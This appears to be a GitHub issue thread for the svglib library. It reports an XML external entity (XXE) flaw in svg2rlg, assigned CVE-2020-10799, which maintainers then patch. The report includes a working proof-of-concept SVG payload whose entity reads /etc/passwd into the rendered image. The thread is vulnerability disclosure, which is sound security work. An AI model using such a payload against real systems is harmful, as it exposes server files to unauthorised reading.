No disabling external entity expansion (XXE)

[MrLion9]

Hi! I found that I can perform XXE attack (https://en.wikipedia.org/wiki/XML_external_entity_attack) when using svg2rlg function

Code:

saved_image_path = 'test_png.png'
with open("./test.svg", "wb") as f: 
            f.write(image)
drawing = svg2rlg(image_path)
renderPM.drawToFile(drawing, saved_image_path, fmt="PNG")

Payload (test.svg)

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg [
    <!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg width="10cm" height="3cm" viewBox="0 0 1000 300"
     xmlns="http://www.w3.org/2000/svg" version="1.1">
  <desc>Example text01 - 'Hello, out there' in blue</desc>

  <text x="250" y="150" 
        font-family="Verdana" font-size="55" fill="blue" >
    &xxe;
  </text>

  <!-- Show outline of canvas using 'rect' element -->
  <rect x="1" y="1" width="998" height="298"
        fill="none" stroke="blue" stroke-width="2" />
</svg>

[deeplook]

It would be nice to put a link like this with your description, if this is what you mean... https://en.wikipedia.org/wiki/XML_external_entity_attack

[MrLion9]

Yes, that’s what I meant )

[averonesis]

Hello @deeplook will you fix the issue?

[claudep]

Hello @averonesis will you suggest a patch?

[claudep]

@MrLion9, could you have a look at the patch, please?

[averonesis]

@claudep yep, looks good, thank you!

[claudep]

I guess you approved through emojis :smile: I reopen, because closing should be done when the patch is merged.

[NicoleG25]

I believe that CVE-2020-10799 was assigned to this issue :)

[claudep]

I pushed both a 0.9.4 release to have a Python 2 compatible release with the fix and a 1.0.0 release which is now Python 2 free.